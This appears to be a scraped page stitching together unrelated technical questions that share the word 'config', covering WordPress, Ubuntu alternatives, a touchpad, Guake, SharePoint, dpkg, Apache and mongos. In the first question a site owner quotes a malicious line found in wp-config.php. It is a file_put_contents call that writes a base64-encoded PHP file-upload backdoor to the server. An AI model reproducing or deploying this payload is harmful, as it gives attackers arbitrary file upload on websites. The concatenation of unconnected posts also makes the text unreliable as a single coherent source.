htaccess and wordpress config files are regularly over written

I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are over written with bad information.

This results in two problems – first the DB access details in wp-config are changed to something don’t work, and then the ability to access my post-link permalinks are lost as a result of information being lost from htaccess.

After being overwritten, my wp-config file is full of lines like this:

file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==')); 

My wp-config file has so many of these lines that it is about 800Kb in size.

The plugins I am using on my WordPress site are as follows:

  • Akismet Anti-Spam [v4.0.1 by Automattic]
  • Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
  • Duplicator [v1.2.3 by Snap Creek]
  • Google Analytics for WordPress [v7.7.1 by MonsterInsights]
  • Hello Dolly [v1.6 by Matt Mullenweg]
  • Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
  • Logo Slider [v1.4.7 by EnigmaWeb]
  • Recent Posts Widget Extended [v0.9.9.7 by Satrya]
  • Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
  • WordPress Importer [v0.6.3 by wordpressdotorg]
  • Yoast SEO [v5.9.1 by Team Yoast]

Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to – however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.


How do I stop these files from being over written?

Or how I can discover what is responsible for changing these files?

How to assign a priority number to “update-alternatives –config gdm3.css” in a single cmdline?

I am able to run these commands in the terminal:

$   sudo update-alternatives --install /usr/share/gnome-shell/theme/gdm3.css gdm3.css /usr/share/gnome-shell/theme/mytheme/mytheme.css 10 $   sudo update-alternatives --config gdm3.css There are 2 choices for the alternative gdm3.css (providing /usr/share/gnome-shell/theme/gdm3.css).    Selection    Path                                                    Priority   Status ------------------------------------------------------------ * 0            /usr/share/gnome-shell/theme/ubuntu.css                  10        auto mode   1            /usr/share/gnome-shell/theme/mytheme/mytheme.css         10        manual mode   2            /usr/share/gnome-shell/theme/ubuntu.css                  10        manual mode  Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/share/gnome-shell/theme/mytheme/mytheme.css to provide /usr/share/gnome-shell/theme/gdm3.css (gdm3.css) in manual mode 

I will put these two cmds in python3.6 subprocess.run().

The issue I have is with the second command. How do I assign /usr/share/gnome-shell/theme/mytheme/mytheme.css to be the alternative of gdm3.css in the same cmdline as sudo update-alternatives --config gdm3.css?

Also, this cmd requires a number entry to select mytheme.css. The assigned number is dependent on the assigned priority, which means the assigned number can be quite arbitrary. How do I overcome the arbitrary nature of the assigned number?

Lubuntu 18.04LTS touchpad config: CLI solution to turn off tapping?

I have seen numerous posts about touchpad issues, but have mainly seen GUI solutions, such as adding “touchpad-indicator” (which didn’t work the way I’d hoped) or synaptics (which froze my keyboard at login requiring a whole reinstall). I have seen a great tutorial of exactly what I hope to accomplish for 18.10 here: anglehit

But the problem is I don’t seem to have an xorg.conf.d file in /etc/X11 in Lubuntu 18.04LTS.

I would love to just open a text editor, change a setting to something like:

tapping = "off" 

Hit save, and be done. Is there any way to do this on Lubuntu 18.04LTS?

Thank you very much.

Purge Guake with config files: Preference files survive somewhere

I need to completely remove Guake. It seems to have some bug that I triggered while setting keybindings. Now the “close tab” keybinding does not work anymore. I tried

$   sudo apt-get purge guake $   sudo apt-get purge --auto-remove guake 

and different variantions of these. When I reinstall Guake, my old preferences are still there: Keybindings, color scheme etc. I can’t locate where the preference files are located though. How can I remove Guake entirely together with the somehow broken preference files?

insufficient sql database permissions for user impersonationlevel config database

What do user try go do that the following error is generated in the wfe server log? I looked at the ULS log for dsmith01 and did not find anything. Please suggest.

Insufficient SQL database permissions for user 'Name: xxx\dsmith01 SID: S-1-5-21-3736358454-1868704084-1822373674-51997 ImpersonationLevel: Impersonation' in database 'SharePoint_Config' on SQL Server instance 'xxxx\SHAREPOINT'. Additional error information from SQL Server is included below.  The EXECUTE permission was denied on the object 'proc_GetTimerRunningJobs', database 'SharePoint_Config', schema 'dbo'. 

Why do I get a root shell by dpkg when choosing ‘examine the situation’ after config file changes?

When updating packages, it sometimes happens that the package distributor ships an updated version of some configuration files. Usually, the following dialogue appears:

==> Modified (by you or by a script) since installation.  ==> Package distributor has shipped an updated version.    What would you like to do about it ?  Your options are:     Y or I  : install the package maintainer's version     N or O  : keep your currently-installed version       D     : show the differences between the versions       Z     : start a shell to examine the situation  The default action is to keep your current version. *** bash.bashrc (Y/I/N/O/D/Z) [default=N] ?  

I chose to start a shell to “examine the situation” (Z).

I probably have to add that the updated configuration file required root permissions to read & write.

I was a little surprised when I saw that the sub-shell was a root shell and I didn’t have to provide a password.

Why do I get a root shell without having to type in the root password?

Isn’t that a security issue?

Apache2 – where is in the config file?

Why there is no <location> in my Apache2 config file?

$   sudo nano /etc/apache2/apache2.conf 

I can find the <Directory /> as follows:

<Directory />         Options FollowSymLinks         AllowOverride None         Require all denied </Directory>  <Directory /usr/share>         AllowOverride None         Require all granted </Directory>  <Directory /var/www>         Options Indexes FollowSymLinks MultiViews         AllowOverride All         Require all granted </Directory> 

But i cannot find at all. I am trying to allow OPTIONS DELETE PUT methods as follows:

<Location "/">     AllowMethods GET POST OPTIONS DELETE PUT     Require all granted </Location> 

My Apache version:

$   apache2 -v Server version: Apache/2.4.38 (Ubuntu) Server built:   2019-08-26T13:31:40 

Any ideas how to add AllowMethods GET POST OPTIONS DELETE PUT?

mongodb: mongos without config server

I’ve deployed a single mongodb data node into my development environment.

My collegues have deployed a multiple sharded mongo instance with several data nodes into pre-production environment.

Up to now, I was able to connect to my development mongodb instance using direct connection, but from now on, I need to use a mongos instance.

I’ve read a bit about mongos. I’ve several questions about it.

  1. Can a mongos be connected to a single mongodb data node (development environment) without a deployed config server?
  2. Sometimes, I’ve read that mongos has to be deployed with my service, into application layer? Is it right? Why?

As you can see here, enter image description here

Shouldn’t mongos instances be placed on data service layer instead of application layer?